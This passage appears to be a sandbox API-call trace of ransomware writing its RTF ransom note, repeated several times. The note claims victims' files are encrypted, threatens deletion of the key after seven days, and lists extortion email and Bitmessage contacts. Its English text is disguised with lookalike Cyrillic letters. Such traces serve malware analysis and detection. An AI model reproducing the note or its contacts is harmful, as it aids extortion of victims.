gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.224] WriteFile (in: hFile=0x2d4, lpBuffer=0x2462808*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2462808*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.224] CloseHandle (hObject=0x2d4) returned 1 [0289.225] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\#readme_eman#.rtf")) returned 0xffffffff [0289.225] GetLastError () returned 0x2 [0289.225] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0289.225] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.225] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.225] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 